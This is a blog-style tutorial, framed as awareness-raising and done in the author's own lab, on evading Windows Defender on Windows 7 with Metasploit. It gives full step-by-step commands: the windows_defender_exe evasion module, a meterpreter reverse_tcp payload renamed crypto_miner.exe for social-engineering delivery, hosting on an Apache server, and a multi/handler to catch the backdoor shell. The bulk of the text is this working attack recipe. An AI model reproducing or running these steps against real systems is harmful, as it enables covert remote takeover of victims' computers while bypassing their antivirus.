Anti-Virus Evasion Techniques
I read about the cryptojacking malware called Beapy on April 27th2019 via articles posted on a NullTX and a TechCruncharticle. According to the TechChrunch article: “In September, some 919,000 computers were vulnerable to EternalBlue attacks — many of which were exploited for mining cryptocurrency. Today, that figure has risen to more than a million.”
The article linked to a Shodan reportwhich listed countries and top operating systems with EternalBlue vulnerabilities. The report showed Windows 7 as a top product affected by EternalBlue, so I decided to find out not how to exploit EternalBlue vulnerabilities but how easy would be to bypass Windows Defenderanti-malware which comes already installed on Windows 7 and found it to be scarily easy.
Disclaimer: I am writing this in an effort to raise awareness to Windows Defender limitations and to encourage users to consider investing in an endpoint protection solution. The penetration test I am about to describe below was done using my own virtualized lab, software, and with my own permission. J Please do not try the steps below without prior written authorization.
Virtualization Tool: VMware Fusion
Attacker: Kali Linux
Attacker’s IP: 192.168.75.159
Victim: Windows 7 Enterprise (Build 7601, Service Pack 1) / Windows Defender
Victim’s IP: 192.168.75.160
Framework: MetaSploit Framework
Module Name: evasion/windows/windows_defender_exe
Payload Name: windows/meterpreter/reverse_tcp
Setting up Windows 7 Enterprise (Victim machine)
Step 1: On a fresh Windows 7 Enterprise install important updates only and reboot.
Step 2: Install latest Windows Defender definitions and reboot.
Setting up Kali Linux (Attacker machine)
Step 1: Click the Metasploit Framework Icon
After you click it, your terminal will launch showing you Metasploit’s current version. In this case it was version 5.0.19-dev. After launching is completed you will see msf5>, which is the command prompt you will use to send commands to MetaSploit.
Step 2: Start your Apache Kali Linux web server by typing service apache2 startin the command prompt and by pressing enter. You will put your payload in your webserver so that you can later transfer it to the victim machine.
Step 3: Type search evasionin the command prompt to find the appropriate module that you intend to use to evade Microsoft Windows Defender. For this example, I have chosen Module#1 called evasion/windows/windows_defender_exe which will contain the executable that you will use to evade Microsoft Windows Defender.
Step 4: Type use evasion/windows/windows_defender_exeto load the executable you will use.
Step 5: You will notice that your command prompt now has windows/windows_defender_exe enclosed in parenthesis.
Type show options. After typing show options, we can see that it chooses a random name for the evasive executable file. In our case Metasploit randomly chose Zju.exe, however, you may rename the file name to suit your social engineering/delivery needs. I will rename the file crypto_miner.exe in the next few steps just to stay in the spirit of the articles I read above.
Step 6: Now we will set up the payload.
Type set PAYLOAD windows/meterpreter/reverse_tcp
This payload will be in the form of an executable and will create a backdoor after being activated in the victim machine. We can then use this backdoor to access the victim machine via our attacker while evading Windows Defender.
Step 7: We now need to set a port that the victim machine will typically have open and which the attacker machine will use to connect. For this exercise, I am using Port 443 (HTTPS). Type set LPORT 443
Step 8: We now need to sept up the ip address that our attacker machine will be using. If you don’t know it you can just type the command ifconfig and it will display it for you. In my case my ip is 192.168.75.159. type ifconfigpress enter and type set LHOST 192.168.75.159
Step 9: Type show optionsto see what is our current set up. Notice the file name is still has its default name Zju.exe. Let’s change it on the next step.Step 10: Type set FILENAME crypto_miner.exeto change the file name.
Step 11: Type show optionsto see current setup. We are almost there! Exciting huh? For me it is! 🙂
Step 12: Type show infoto display a description summary of what you are about to exploit. Please read the description in the screenshot.
Step 13: Type exploit so that MetaSploit can compile the executable for you. Please note that it will store the executable at /root/.msf4/local/crypto_miner.exe. Please navigate through the file directories until you can see the executable.
Please note that we were using windows/windows_defender_exe module to set up our module. Now we need to use MetaSploit multi-handler session to establish a session with our victim machine.
Step 14: type back
Step 15: type use multi/handler
Step 16: type set PAYLOAD windows/meterpreter/reverse_tcp
Step 17: type setLHOST 192.168.75.159
Step 18: type set LPORT 443
Step 19: type exploit
Step 20: double click on the crypto_miner.exe and choose Run
Meterpreter will now start a reverse TCP handler and it will just be waiting for the victim to click and run on crypto_miner.exe.
Now it is time to deliver crypto_miner.exe payload to the victim machine.
For this exercise I will copy the payload to the attacker’s apache server so that I can access it from the victim machine by typing 192.168.75.159/crypto_miner.exe in the victim’s web browser.
Typically, you would receive this type of payload by clicking on an unknown link or inserting an unknow program on your computer.
Your victim machine will ask you if you wish to run or save this file. Click save and save it to the desktop and make sure you have Windows Defender turned on.
Step 21: Go back to the attacker machine and you will see a Meterpreter command line! type sysinfo so you can see the victim machine. From here on as long as you keep a session with the machine you own it!